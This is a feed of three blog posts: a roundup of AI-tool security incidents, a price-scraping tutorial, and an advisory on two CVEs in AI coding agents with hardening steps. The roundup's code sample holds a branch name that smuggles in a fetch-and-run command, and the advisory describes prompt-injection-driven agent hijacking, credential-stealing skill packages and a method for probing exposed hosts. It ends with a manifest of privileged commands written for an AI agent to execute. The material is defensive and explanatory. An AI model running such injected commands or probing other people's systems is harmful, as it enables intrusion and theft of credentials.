2026-03-31 06:35:45
This was the week AI security stopped being theoretical.
Three events, all within days of each other, paint a picture that every developer building with AI tools needs to understand.
BeyondTrust's Phantom Labs team (Tyler Jespersen) found a critical vulnerability in OpenAI Codex affecting all Codex users.
The attack: command injection through GitHub branch names in task creation requests. An attacker could craft a malicious branch name that, when processed by Codex, would exfiltrate a victim's GitHub tokens to an attacker-controlled server.
The impact: full read/write access to a victim's entire codebase. Lateral movement across repositories. Everything.
OpenAI patched it quickly. But the pattern is what matters: AI coding tools inherit trust from user context (GitHub tokens, env vars, API keys) but don't treat that context as a security boundary.
Every AI coding tool that touches git has this same attack surface. Basically nobody is auditing for it.
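The pattern is easy to reproduce. A minimal sketch (hypothetical helper names, not OpenAI's actual code) of how an attacker-controlled branch name becomes command injection when it's interpolated into a shell string, versus the argv-list form that avoids it:

```python
def checkout_unsafe(branch: str) -> str:
    # DANGEROUS (illustrative): the branch name is interpolated into a
    # shell string, so a name like 'x; curl evil.sh | sh' runs attacker code.
    return f"git checkout {branch}"

def checkout_safe(branch: str) -> list[str]:
    # Safer: pass argv as a list (no shell involved), and reject
    # names that contain anything beyond typical branch characters.
    if not branch.replace("/", "").replace("-", "").replace("_", "").replace(".", "").isalnum():
        raise ValueError(f"refusing suspicious branch name: {branch!r}")
    return ["git", "checkout", "--", branch]

malicious = "main; curl https://evil.example/x | sh"
print(checkout_unsafe(malicious))  # the payload survives into the shell string
print(checkout_safe("feature/login-fix"))
```

The argv-list form plus an allowlist check treats the branch name as data, not code, which is exactly the boundary these tools currently skip.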
On March 24, 2026, litellm version 1.82.8 was published to PyPI with a malicious .pth file that executed automatically on every Python process startup.
The payload: a multi-stage credential stealer targeting AI pipelines and cloud secrets. The same threat actor (TeamPCP) had already compromised Trivy, KICS, and Telnyx across five supply chain ecosystems.
This is the package that most AI proxy servers use. If you're routing API calls through litellm (and many vibe-coded apps do), you were exposed.
Endor Labs just published their analysis showing this is the same attacker behind the Trivy and KICS compromises. This is a coordinated campaign targeting AI infrastructure specifically.
Anthropic released Computer Use for Claude Code. Claude can now open your apps, click through your UI, and test what it built, all from the CLI.
The capability is impressive. The security implications are sobering.
With Computer Use, the feedback loop is fully closed: Claude writes code, runs it, tests it visually, finds bugs, fixes them, deploys. No human in the loop.
This isn't Claude's fault. The tool works as designed. But it means insecure code ships faster than ever, with more confidence, because "it tested itself."
All three events share a common thread: trust boundaries in AI development are poorly defined.
One of those poorly defined boundaries: your toolchain treats pip install litellm as a safe operation.
Meanwhile, 9to5Mac reports that vibe coding has broken Apple's App Store review queue. Wait times are up from less than a day to 3+ days. The volume of AI-generated app submissions has overwhelmed human reviewers.
What comes next is predictable: automated security gates. Apple, Google, and every app marketplace will add automated scanning. Apps with exposed API keys, missing authentication, and hardcoded secrets will get auto-rejected before a human ever looks at them.
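Those automated gates are straightforward to approximate yourself. A toy pre-submission scanner (the key patterns here are illustrative assumptions, far cruder than what real scanners like gitleaks or trufflehog ship):

```python
import re

# Illustrative patterns only — real scanners ship hundreds of vetted rules.
# The exact key shapes below are assumptions for demonstration.
SECRET_PATTERNS = {
    "openai_key": re.compile(r"sk-[A-Za-z0-9]{20,}"),
    "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "generic_assignment": re.compile(
        r"(?i)(api[_-]?key|secret|token)\s*[:=]\s*['\"][^'\"]{8,}['\"]"
    ),
}

def scan_source(text: str) -> list[str]:
    """Return the names of patterns that match anywhere in the text."""
    return [name for name, pat in SECRET_PATTERNS.items() if pat.search(text)]

code = 'API_KEY = "sk-abcdefghijklmnopqrstuv"\nprint("hello")'
print(scan_source(code))
```

Running something like this in CI before submission catches the auto-reject cases before the store does.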
If you're shipping vibe-coded apps:
Pin your dependencies. Use lockfiles. Verify hashes. Don't pip install without knowing exactly what version you're getting.
Treat AI-generated code as untrusted input. Review it the way you'd review a PR from a new hire. The code works, but "works" and "secure" are different things.
Scan before shipping. Tools like VibeCheck scan your GitHub repos and deployed URLs for the common vibe coding mistakes: exposed API keys, missing auth, open endpoints, insecure headers.
Assume your secrets are exposed. If you've ever hardcoded an API key in a vibe-coded project, rotate it now. Not tomorrow. Now.
Add rate limiting to every public endpoint. The bots are faster than your users.
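Rate limiting doesn't need infrastructure to start. A minimal in-process token bucket shows the idea (a sketch; real deployments should use their gateway's or framework's limiter):

```python
import time

class TokenBucket:
    """Minimal per-client token bucket: `rate` requests/sec, bursts up to `capacity`."""
    def __init__(self, rate: float, capacity: int):
        self.rate = rate
        self.capacity = capacity
        self.tokens = float(capacity)
        self.last = time.monotonic()

    def allow(self) -> bool:
        # Refill proportionally to elapsed time, capped at capacity.
        now = time.monotonic()
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False

bucket = TokenBucket(rate=5, capacity=10)  # 5 req/s steady, bursts of 10
results = [bucket.allow() for _ in range(12)]
print(results.count(True))  # the burst is capped at the bucket's capacity
```

Keep one bucket per client IP (a dict keyed by address) and the bots stop being faster than your users.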
The AI coding revolution is real. The security crisis is also real. They're the same thing.
I track vibe coding security tools and incidents at notelon.ai. Free scanner, no signup required.
2026-03-31 06:35:34
Was spending every Monday morning checking 23 competitor product pages. Copy URL, open tab, scroll to price, write it down. Repeat. 3 hours 47 minutes gone on average.
Decided to automate it.
Running a small e-commerce thing on the side. Needed to stay competitive on pricing. But manually checking prices across Amazon, eBay, and niche sites? Tedious as hell.
Spreadsheet had columns for:
Every. Single. Week. Manually.
Thought I'd write a quick script. Grab HTML, parse price, done.
import requests
from bs4 import BeautifulSoup
url = "https://example.com/product/123"
response = requests.get(url)
soup = BeautifulSoup(response.text, 'html.parser')
price = soup.find('span', class_='price').text
Worked for maybe 3 sites. Then the rest broke.
Back to manual checking. Annoying.
Ended up fixing it in a couple of ways
Split the problem:
Amazon/eBay (big sites): Used existing scraper APIs instead of fighting detection. Thought I could beat Amazon's bot detection myself. I couldn't. ParseForge has Amazon product scrapers that handle that stuff already. Saved me from spending a week on proxy rotation.
Small sites: Basic requests + BeautifulSoup worked fine. These sites don't have serious bot detection.
Storage: Just appended to CSV. Thought about Postgres or something fancier. Then I realized weekly price checks = maybe 1,200 rows per year. CSV opens in Excel. Done.
Script looks something like:
import csv
import requests
from bs4 import BeautifulSoup
from datetime import datetime

# Small site scraping
def get_basic_price(url, selector):
    try:
        response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0'}, timeout=10)
        soup = BeautifulSoup(response.text, 'html.parser')
        price_text = soup.select_one(selector).text
        # Clean: "$19.99" -> 19.99
        return float(price_text.replace('$', '').replace(',', '').strip())
    except Exception:
        return None

# Amazon/big sites: use API
def get_amazon_price(product_id):
    # Call scraper API here
    # Returns structured data (price, title, rating, etc.)
    pass

# Weekly run
products = [
    {'name': 'Widget A', 'url': 'https://smallsite.com/widget-a', 'selector': '.price'},
    {'name': 'Widget B', 'asin': 'B08XYZ123', 'platform': 'amazon'},
]

results = []
for product in products:
    if 'asin' in product:
        price = get_amazon_price(product['asin'])
    else:
        price = get_basic_price(product['url'], product['selector'])
    results.append({
        'product': product['name'],
        'price': price,
        'date': datetime.now().strftime('%Y-%m-%d'),
    })

# Save to CSV
with open('competitor_prices.csv', 'a', newline='') as f:
    writer = csv.DictWriter(f, fieldnames=['product', 'price', 'date'])
    writer.writerows(results)
Now runs every Monday via cron. Takes 47 seconds instead of 4+ hours.
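That Monday run is one crontab line (script path and log location below are placeholders):

```shell
# Run the price checker every Monday at 07:00; append output to a log
0 7 * * 1 /usr/bin/python3 /home/me/price_check/check_prices.py >> /home/me/price_check/cron.log 2>&1
```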
Couple things that made it actually work
Don't fight big sites
Error handling matters more than I thought
CSV is good enough
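The error-handling point boils down to: every fetch gets a timeout and a retry, and failures return None instead of crashing the weekly run. A sketch with a stub standing in for a real request:

```python
import time

def fetch_with_retries(fetch, attempts=3, delay=1.0):
    """Call `fetch()` up to `attempts` times with exponential backoff.
    Returns None instead of raising, so one broken site doesn't kill the run."""
    for i in range(attempts):
        try:
            return fetch()
        except Exception:
            if i < attempts - 1:
                time.sleep(delay * (2 ** i))  # 1s, 2s, 4s...
    return None

# Stub standing in for a flaky requests.get call — fails twice, then succeeds:
calls = {"n": 0}
def flaky():
    calls["n"] += 1
    if calls["n"] < 3:
        raise ConnectionError("timed out")
    return 19.99

print(fetch_with_retries(flaky, attempts=3, delay=0))
```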
Honestly would add:
But current version does the job. 4 hours back per week.
Basic approach:
ParseForge has scrapers for Amazon, eBay, Walmart if you're tracking those. Handles the annoying stuff, though you still have to clean the data yourself.
Went from manual Monday drudgery to automated. Worth the weekend it took to build.
2026-03-31 06:30:41
Two critical vulnerabilities — CVE-2026-22812 (CVSS 8.8) and CVE-2026-22813 (CVSS 9.6) — affect the most widely deployed open-source AI coding agent platforms. 220,000+ instances are exposed on the public internet with no authentication. 15,200 are confirmed vulnerable to unauthenticated remote code execution. But the exposure isn't limited to cloud servers — the same agent running on your Mac Mini under your desk has the same root-level access to your files, your credentials, and your network. This article provides the technical analysis, the exposure data, remediation for both VPS and local hardware deployments, and a 5-layer defense architecture that works regardless of where your agent runs.
Apple cannot keep the Mac Mini in stock. The M4 and M4 Pro configurations are backordered across most retailers, and the reason is not what Apple planned for. Developers are buying them to run AI coding agents locally — specifically OpenClaw, which needs Apple Silicon's unified memory architecture for local LLM inference.
The logic makes sense on paper. A $600 Mac Mini with 16GB of unified memory runs a 7B parameter model fast enough for real-time coding assistance. A $1,400 M4 Pro with 48GB runs 34B models comfortably. No cloud costs. No API rate limits. No data leaving your network. Private, fast, and owned.
There is one problem. The agent running on that Mac Mini has the same privileges as the user who launched it. On most developer machines, that means read/write access to everything under ~/ — every project, every .env file, every SSH key.
A Meta security researcher had to physically unplug her Mac Mini to stop an AI coding agent from deleting her email inbox. The agent was running with full system permissions and connected to a compromised skill package. It began executing destructive commands that could not be stopped through the UI because the WebSocket connection was being used by the attacker's injected scripts.
That incident happened on a local machine with no internet exposure. The attack vector was not a network exploit — it was a malicious package in the agent's skill chain.
For the 220,000+ instances running on VPS infrastructure with no authentication and no firewall, the same attack can be executed remotely by anyone on the internet.
The industry spent two months talking about the 220,000 number. What it missed is that the number only counts servers. It does not count the desks.
CVE ID: CVE-2026-22812
CVSS Score: 8.8 (High)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Affected Software: OpenCode HTTP server (serve mode), OpenClaw instances
Discovery: Reported via NVD/NIST, confirmed by SecurityScorecard STRIKE team
When an AI coding agent runs in serve mode — exposing an HTTP and WebSocket interface for browser-based interaction — the server binds to 0.0.0.0 by default. In versions prior to 1.1.10, this server has no authentication mechanism whatsoever. Even in 1.1.10+, where the server is disabled by default, enabling it provides only optional Basic Auth that most deployments skip.
Any process on the network — or anyone on the internet if the server is publicly reachable — can read files, write files, execute shell commands, and install packages through the agent's interface.
The agent is not a code assistant. It is a full remote shell with an AI interface.
On a VPS: If port 4096 is open, the entire internet has root access.
On a Mac Mini: If the agent binds to 0.0.0.0 instead of 127.0.0.1, every device on the local network has root access. On a coffee shop WiFi, a coworking space, a hotel — that is everyone in the room.
| Component | Value | Meaning |
|---|---|---|
| Attack Vector | Network | Exploitable remotely |
| Attack Complexity | Low | No special conditions required |
| Privileges Required | None | No authentication needed |
| User Interaction | None | No victim action required |
| Scope | Unchanged | Stays within the vulnerable component |
| Confidentiality | High | Full read access |
| Integrity | High | Full write access |
| Availability | High | Full denial of service possible |
This is a trivially exploitable vulnerability. If the port is reachable, the system is compromised.
CVE ID: CVE-2026-22813
CVSS Score: 9.6 (Critical)
Affected Software: OpenClaw web UI
The web interface that renders AI agent output does not sanitize the markdown and HTML returned by the language model. An attacker who can influence the LLM's output — through prompt injection, malicious context documents, or compromised training data — can inject arbitrary JavaScript that executes in the user's browser session.
Because the browser session has an active WebSocket connection to the agent backend, this JavaScript can send commands to the agent as if the user typed them, exfiltrate the contents of the current session, execute shell commands through the agent's execution interface, and persist across sessions if the injected script writes to the agent's context files.
This is the vulnerability that matters most for Mac Mini owners. CVE-2026-22812 requires network access to the agent's port. CVE-2026-22813 does not. It requires only that the agent processes a file, package, or repository that contains adversarial content. Given that AI coding agents routinely clone repositories, install npm/pip/cargo packages, read documentation files, and process code review comments — the attack surface is every piece of content the agent interacts with.
The Mac Mini on your desk. Running a local model. No cloud connection. Still vulnerable to CVE-2026-22813 through a poisoned package.json or a malicious code review comment.
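The root fix is encoding model output before it reaches the DOM. A minimal sketch of the principle (this is not the project's actual patch; production web UIs should use a vetted sanitizer such as DOMPurify on the browser side):

```python
import html

def render_agent_output(markdown_text: str) -> str:
    """Escape LLM output before rendering so injected markup becomes
    inert text instead of executable HTML/JavaScript."""
    return html.escape(markdown_text, quote=True)

# A poisoned snippet the agent might echo back from a malicious README:
payload = 'Here is your diff. <img src=x onerror="ws.send(\'rm -rf ~\')">'
print(render_agent_output(payload))
```

The escaped string renders as visible text; the onerror handler never fires, and the WebSocket bridge described above never receives the injected command.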
Between January and March 2026, multiple independent security research groups conducted internet-wide scans targeting AI coding agent infrastructure:
| Finding | Count | Source |
|---|---|---|
| OpenClaw instances exposed on public internet | 220,000+ | Censys, Bitsight, Penligent |
| Instances confirmed vulnerable to RCE (CVE-2026-22812) | 15,200 | Penligent |
| Instances correlated with prior breach activity | 53,300 | SecurityScorecard STRIKE team |
| Malicious packages in ClawHub skill marketplace | 1,184 | CyberDesserts |
| Leaked API tokens (Supabase breach) | 1,500,000 | Infosecurity Magazine |
| Leaked email addresses (same breach) | 35,000 | Infosecurity Magazine |
These numbers are the ones that made the news. They count VPS deployments — Hetzner, DigitalOcean, Linode, Contabo — where a developer provisioned a server, installed the agent, started serve mode, and did not configure a firewall.
What they do not count: Mac Minis on home networks. Development laptops in coworking spaces. Workstations in offices with flat network topologies. These machines are not indexed by Censys. They are not visible to Shodan. But if the agent's HTTP server binds to anything other than 127.0.0.1, every device on the same network segment has the same unauthenticated access that the internet has to those 220,000 VPS instances.
The 220,000 number is a floor. The actual exposure includes every unsandboxed AI coding agent running on every machine where the developer has not explicitly configured network isolation. The Mac Mini shortage suggests that number is growing, not shrinking.
The 1,184 malicious packages discovered in the ClawHub skill marketplace represent a systemic supply chain compromise. These packages masqueraded as legitimate MCP skills but contained credential harvesters, reverse shells, cryptominers, and data exfiltration routines.
This is the attack path that bypasses all network-level defenses. A tunnel does not help if the agent itself installs a malicious package that reads ~/.ssh/id_rsa and uploads it to an attacker's server. A firewall does not help if the package phones home through an outbound HTTPS connection that looks identical to a legitimate API call.
Defense requires both network isolation (Layers 1–3) and permission scoping (Layer 5). Neither alone is sufficient.
The root cause is not a coding error. It is an architectural assumption.
AI coding agents were designed as local development tools. They assume a trusted network — your laptop, your home WiFi. The HTTP server is a convenience feature: start the agent, open a browser tab, start coding.
That assumption fails in two directions simultaneously:
Direction 1: Servers. Developers run agents on VPS infrastructure because they need persistent execution, shared team access, and GPU availability. The agent's HTTP server, designed for localhost, is now reachable from the public internet. This produced the 220,000 exposed instances.
Direction 2: Local hardware at scale. The Mac Mini shortage proves that developers are deploying AI agents on physical hardware in volumes that matter. These machines sit on home networks, office networks, and coffee shop WiFi. They are not behind firewalls. They are not running in sandboxes. The agent has the same access to the filesystem, the network, and the macOS Keychain that the developer does. The difference from the VPS scenario is visibility — no one is scanning home networks, so the exposure goes unreported.
Both directions share the same gap: the tooling provided zero infrastructure guidance. No documentation for firewall configuration. No reverse proxy templates. No authentication integration. No sandboxing guide for macOS. No permission scoping.
Developers were told "start the server and open a browser." They did.
The following describes the verification methodology used by researchers. This information is provided for defensive purposes — to help teams verify whether their own instances are vulnerable.
Step 1: Use Censys, Shodan, or any internet-facing port scanner to identify hosts running the agent's HTTP server. The default port is 4096. The server responds with a distinctive HTTP response that includes WebSocket upgrade headers and the agent's UI HTML.
GET / HTTP/1.1
Host: <target-ip>:4096
A vulnerable instance returns a 200 response with the full agent interface. There is no login page. There is no authentication challenge.
Step 2: Connect to the WebSocket endpoint. The agent accepts commands in its standard message format. Any command that the agent can execute — file operations, shell commands, package installations — is available to the attacker.
Step 3: Send a benign verification command (e.g., whoami, hostname, uname -a). If the agent returns system information, the instance is confirmed vulnerable.
Important: Do not execute destructive commands. Do not access, copy, or modify any data. Verification should confirm the vulnerability exists and stop. Report findings to the instance owner if identifiable.
Step 1: On the machine running the agent, check what address the server is bound to:
# macOS
lsof -i :4096
# Linux
ss -tlnp | grep 4096
If the output shows *:4096 or 0.0.0.0:4096, the agent is listening on all network interfaces — not just localhost. Any device on the same network can connect.
Step 2: From another device on the same network (phone, laptop, tablet), open a browser and navigate to http://<mac-mini-ip>:4096. If the agent's interface loads, the machine is exposed to the local network.
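Steps 1 and 2 can also be scripted. A small reachability probe (run from another machine with the Mac Mini's LAN IP substituted for the placeholder):

```python
import socket

def port_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """True if a TCP connection to host:port succeeds — i.e. the agent
    (or anything else) is reachable at that address."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0

# On the agent machine itself:
print("localhost:", port_open("127.0.0.1", 4096))
# From another device, substitute the Mac Mini's LAN IP (placeholder):
# print("lan:", port_open("192.168.1.50", 4096))
```

If the LAN-IP probe returns True from your phone or laptop, the agent is exposed to everyone on that network segment.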
Step 3: Check what the agent process has access to:
# What user is running the agent?
whoami
# What files are readable?
ls ~/
# Is the macOS Keychain accessible?
security list-keychains
# Are SSH keys present?
ls ~/.ssh/
# Are environment variables set with API keys?
env | grep -i key
In the majority of local installations, the agent runs as the primary user account — which means full access to the home directory, all development projects, all SSH keys, and all environment variables containing API credentials.
The following architecture addresses both CVEs at the infrastructure level. The first three layers apply to VPS deployments. All five layers apply to any deployment, including local hardware.
For VPS deployments:
Use an outbound-only encrypted tunnel instead of opening inbound ports. Cloudflare Tunnel (cloudflared) establishes a connection from your server to Cloudflare's network using outbound-only QUIC connections on port 7844. No inbound ports are opened. The server's IP address is never exposed. All traffic routes through Cloudflare's 330+ city anycast network.
# Install cloudflared
curl -fsSL https://pkg.cloudflare.com/cloudflare-main.gpg \
| gpg --dearmor -o /usr/share/keyrings/cloudflare.gpg
echo "deb [signed-by=/usr/share/keyrings/cloudflare.gpg] \
https://pkg.cloudflare.com/cloudflared $(lsb_release -cs) main" \
| tee /etc/apt/sources.list.d/cloudflared.list
apt update && apt install cloudflared
# Create tunnel (requires Cloudflare API token)
cloudflared tunnel create my-agent-tunnel
# Configure: route agent.yourdomain.com → localhost:4096
# Catch-all: return 404 for all other hostnames
Configuration note: Set the tunnel's catch-all to http_status:404. This ensures that any request arriving at Cloudflare that does not match your specific hostname is rejected before it reaches your server.
For Mac Mini / local hardware:
Force the agent to bind to 127.0.0.1 only — never 0.0.0.0. This restricts the HTTP server to connections originating from the same machine.
# If the agent supports a bind address flag:
opencode serve --host 127.0.0.1
# Verify it's not listening on all interfaces:
lsof -i :4096
# Should show: 127.0.0.1:4096, NOT *:4096
If you need to access the agent from another device (e.g., your laptop connecting to a Mac Mini on your desk), use SSH port forwarding instead of exposing the port:
# From your laptop, forward local port 4096 to the Mac Mini's localhost:4096
ssh -L 4096:127.0.0.1:4096 user@mac-mini-ip
# Then open http://localhost:4096 in your laptop's browser
# Traffic is encrypted through the SSH tunnel — never exposed on the network
For persistent remote access, Cloudflare Tunnel works on macOS as well:
# Install on macOS
brew install cloudflare/cloudflare/cloudflared
# Same tunnel configuration as Linux — agent stays on localhost,
# Cloudflare handles authenticated remote access
What this prevents: On VPS — direct IP scanning, port-based attacks, DDoS. On local hardware — exposure to every device on the same WiFi or LAN. The agent becomes reachable only through authenticated channels.
Cloudflare Zero Trust Access enforces authentication at the edge. Before a request is proxied to your tunnel (and therefore your server or Mac Mini), the user must authenticate through an identity provider — Google, GitHub, one-time pin via email, or any SAML/OIDC provider.
Access Policy:
Action: Allow
Include: Emails ending in @yourdomain.com
Session duration: 24 hours
Cookie: SameSite=None, HttpOnly, Binding=Enabled
Critical configuration for WebSocket agents: The SameSite=None and Binding Cookie settings are required for AI coding agents that use WebSocket connections. Without them, the browser's WebSocket upgrade request will fail the cookie check and the session will drop mid-conversation. This is a common misconfiguration that causes intermittent disconnections.
What this prevents: Unauthorized access from anyone who does not possess valid identity credentials. Even if an attacker discovers the agent's URL, they see a Cloudflare login page — not the agent interface.
Enable authentication on the agent's HTTP server itself as a secondary gate.
# Generate a high-entropy password
AGENT_PASSWORD=$(openssl rand -base64 24)
# Set as environment variable for the agent process
# Linux (systemd): add the password to the unit's environment via an override
mkdir -p /etc/systemd/system/opencode.service.d
cat > /etc/systemd/system/opencode.service.d/override.conf << EOF
[Service]
Environment="OPENCODE_SERVER_PASSWORD=$AGENT_PASSWORD"
EOF
systemctl daemon-reload && systemctl restart opencode
# macOS (launchd or manual):
export OPENCODE_SERVER_PASSWORD=$AGENT_PASSWORD
opencode serve
Important caveat: When Zero Trust Access is active, enabling Basic Auth on the agent server can create an authentication loop (Access redirects on 401, server returns 401 before Access processes). The correct implementation is conditional: set the server password only when Zero Trust is not configured. When Zero Trust is active, it is the authentication layer.
For VPS (Ubuntu/Debian):
# Firewall: deny all inbound, allow SSH only
ufw default deny incoming
ufw default allow outgoing
ufw allow ssh
ufw --force enable
# Port 4096 is NOT opened — all agent traffic goes through the tunnel
# Brute force protection
apt install -y fail2ban
systemctl enable fail2ban
# Kernel hardening
cat >> /etc/sysctl.d/99-hardening.conf << 'EOF'
net.ipv4.tcp_syncookies = 1
net.ipv4.conf.all.rp_filter = 1
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.conf.all.accept_redirects = 0
kernel.randomize_va_space = 2
net.ipv4.conf.all.log_martians = 1
EOF
sysctl --system
# Automatic security updates
apt install -y unattended-upgrades
dpkg-reconfigure -plow unattended-upgrades
| Control | What it does |
|---|---|
| UFW (default deny) | Blocks all inbound traffic except SSH |
| fail2ban | Bans IPs after repeated failed SSH attempts |
| SYN cookies | Prevents SYN flood denial of service |
| Reverse path filtering | Prevents IP spoofing |
| ICMP broadcast ignore | Prevents Smurf amplification attacks |
| Redirect rejection | Prevents ICMP redirect hijacking |
| ASLR (full) | Randomizes memory addresses to defeat buffer overflow exploits |
| Martian logging | Logs packets with impossible source addresses |
| Unattended upgrades | Automatically applies security patches |
For Mac Mini / macOS:
macOS does not need the same kernel hardening (it ships with ASLR, SIP, and Gatekeeper enabled). The priorities are different:
# Enable the macOS firewall
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on
# Block all incoming connections (allow only essential services)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setblockall on
# Enable stealth mode (don't respond to pings or port scans)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setstealthmode on
# Verify settings
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
Additional macOS-specific hardening:
# Disable Remote Login (SSH) if you don't need it
sudo systemsetup -setremotelogin off
# Disable Remote Management
sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart \
-deactivate -configure -access -off
# Enable FileVault (full disk encryption) — critical if the machine is physically accessible
sudo fdesetup enable
# Automatic updates
sudo softwareupdate --schedule on
| Control | What it does |
|---|---|
| macOS Firewall (block all) | Blocks all incoming connections |
| Stealth mode | Makes the machine invisible to network scans |
| FileVault | Encrypts the entire disk — protects if the machine is stolen |
| Remote Login off | Disables SSH access if not needed |
| Automatic updates | Applies security patches as they ship |
Post-deployment: Disable SSH password authentication on both VPS and macOS. Use key-only access:
# Linux
sed -i 's/^#\?PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config
sed -i 's/^PermitRootLogin yes/PermitRootLogin prohibit-password/' /etc/ssh/sshd_config
systemctl restart sshd
# macOS (if SSH is enabled)
sudo sed -i '' 's/^#PasswordAuthentication yes/PasswordAuthentication no/' /etc/ssh/sshd_config
sudo launchctl stop com.openssh.sshd && sudo launchctl start com.openssh.sshd
This layer is the one that defends against CVE-2026-22813 and supply chain attacks — the threats that bypass all network-level protection. It applies equally to VPS deployments and Mac Mini setups.
MCP servers — now governed by the Linux Foundation with backing from Anthropic, OpenAI, Google, Microsoft, AWS, and Cloudflare — provide a standardized interface between AI agents and external tools. The critical security feature of MCP is that each server connection can be independently scoped:
- write: false — they can analyze code, run audits, and report findings, but cannot modify files
- bash: false — they cannot execute arbitrary commands regardless of what the LLM requests
# Example: read-only security auditor
agent:
name: security-reviewer
tools:
write: false
edit: false
bash: false
mcp:
- cloudflare-docs # Can read documentation
- github # Can read repositories
# Cannot: deploy, modify, execute
This is not behavioral guardrailing. The agent cannot prompt its way past these restrictions. The MCP server simply does not expose write operations to agents configured as read-only. The permission boundary is enforced at the infrastructure layer, not the prompt layer.
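The enforcement model fits in a few lines. In this sketch the dispatcher consults a static permission set, so no prompt can widen it (the agent names, tool names, and permission sets below are hypothetical):

```python
# Infrastructure-level permission scoping: the dispatcher, not the prompt,
# decides which tools exist for a given agent.
AGENT_PERMISSIONS = {
    "security-reviewer": {"read", "grep"},           # read-only auditor
    "builder":           {"read", "write", "bash"},  # full-access agent
}

def dispatch(agent: str, tool: str, *args):
    allowed = AGENT_PERMISSIONS.get(agent, set())
    if tool not in allowed:
        # No LLM output can change this branch — the tool simply
        # isn't exposed to this agent.
        raise PermissionError(f"{agent} has no '{tool}' tool")
    return f"ran {tool}{args}"

print(dispatch("security-reviewer", "read", "main.py"))
try:
    dispatch("security-reviewer", "bash", "rm -rf ~")
except PermissionError as e:
    print("blocked:", e)
```

Even a fully compromised model session can only call what the dispatcher exposes, which is the property that bounds supply chain damage.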
For Mac Mini owners specifically: This layer is your primary defense against supply chain attacks. A malicious package installed by the agent can execute code with the agent's permissions. If the agent has unrestricted filesystem and shell access, the package has unrestricted filesystem and shell access. Scoped MCP permissions mean that even if the agent is tricked into installing a malicious package, the damage is bounded by the agent's configured permission set — not by the user's full system access.
A quick self-check, in order of urgency:
- ss -tlnp | grep 4096 — if the port is listening, check if it's reachable from outside. Search Censys or Shodan for your server's IP.
- ufw deny 4096 — the single fastest remediation.
- lsof -i :4096 — if it shows *:4096, your agent is exposed to your entire network. Restart it bound to --host 127.0.0.1.
- Audit ~/.ssh/authorized_keys. Check for unexpected cron jobs (VPS) or Launch Agents (macOS). Review outbound network connections for unfamiliar destinations.
- Keep API keys in per-project .env files instead of global exports.
You just read 4,000 words of vulnerability analysis and remediation steps. Your AI coding agent — the one this article is about — can execute every one of them.
Copy the block below. Paste it into your agent's chat. Say: "Do this."
The agent will read the manifest, execute each step in order, stop when a condition isn't met, and ask you for credentials only when it needs them. It will not guess. It will not skip.
This is how security advisories should work in 2026. Not "read this and figure it out" — but "read this and execute."
## Agent-Executable Remediation Manifest
## CVE-2026-22812 (CVSS 8.8) + CVE-2026-22813 (CVSS 9.6)
## Source: Hodge Luke Digital Intelligence Agency
## Target: Any VPS or macOS machine running an AI coding agent
### INSTRUCTIONS FOR AGENT
Execute each step sequentially. Do not skip steps.
STOP_IF conditions halt execution — explain why to the user and await instructions.
ASK_USER directives require user input before proceeding — do not guess values.
All commands must be run with appropriate privileges (sudo where indicated).
Report the result of each step before moving to the next.
---
### Step 0: Detect platform
Run: uname -s
IF output contains "Darwin" → SET PLATFORM=macos
IF output contains "Linux" → SET PLATFORM=linux
REPORT: "Detected platform: [PLATFORM]"
---
### Step 1: Check if an agent HTTP server is running
IF PLATFORM=linux:
Run: ss -tlnp | grep -E ':(4096|3000|8080|8888) '
IF PLATFORM=macos:
Run: lsof -i -P | grep -E ':(4096|3000|8080|8888) .*(LISTEN)'
STOP_IF: No output (no agent server detected — this machine may not be affected)
REPORT: "Found agent server listening on: [port and address]"
IF output shows 0.0.0.0 or *: → REPORT: "WARNING: Agent is bound to all
interfaces — exposed to the network. Proceeding with remediation."
IF output shows 127.0.0.1 only → REPORT: "Agent is bound to localhost only.
Network exposure is limited. Continuing with hardening steps."
---
### Step 2: Block the port immediately
IF PLATFORM=linux:
Run: sudo ufw status
IF ufw is inactive:
Run: sudo ufw default deny incoming
Run: sudo ufw default allow outgoing
Run: sudo ufw allow ssh
Run: sudo ufw --force enable
Run: sudo ufw deny [detected port from Step 1]
Run: sudo ufw reload
REPORT: "Firewall enabled. Port [port] blocked."
IF PLATFORM=macos:
Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
IF firewall is disabled:
Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on
Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setblockall on
Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setstealthmode on
REPORT: "macOS firewall enabled. All incoming blocked. Stealth mode on."
---
### Step 3: Force localhost binding
IF PLATFORM=linux:
Check if agent is managed by systemd:
Run: systemctl list-units --type=service | grep -i -E 'opencode|claw'
IF found:
REPORT: "Agent is running as systemd service: [service name]"
ASK_USER: "Should I modify the service to bind to 127.0.0.1 only? (yes/no)"
IF yes:
Run: sudo mkdir -p /etc/systemd/system/[service].d
Write override.conf with Environment="HOST=127.0.0.1"
Run: sudo systemctl daemon-reload
Run: sudo systemctl restart [service]
IF PLATFORM=macos:
REPORT: "On macOS, restart your agent with: --host 127.0.0.1"
REPORT: "Example: opencode serve --host 127.0.0.1"
ASK_USER: "What is the command you use to start your agent? I will provide
the modified command with localhost binding."
---
### Step 4: Install Cloudflare Tunnel (optional but recommended)
ASK_USER: "Do you want to set up a Cloudflare Tunnel for secure remote
access? This requires a Cloudflare account. (yes/no)"
STOP_IF: User says no (skip to Step 5)
ASK_USER: "Please provide your Cloudflare API token with Zone:DNS:Edit and
Account:Cloudflare Tunnel:Edit permissions."
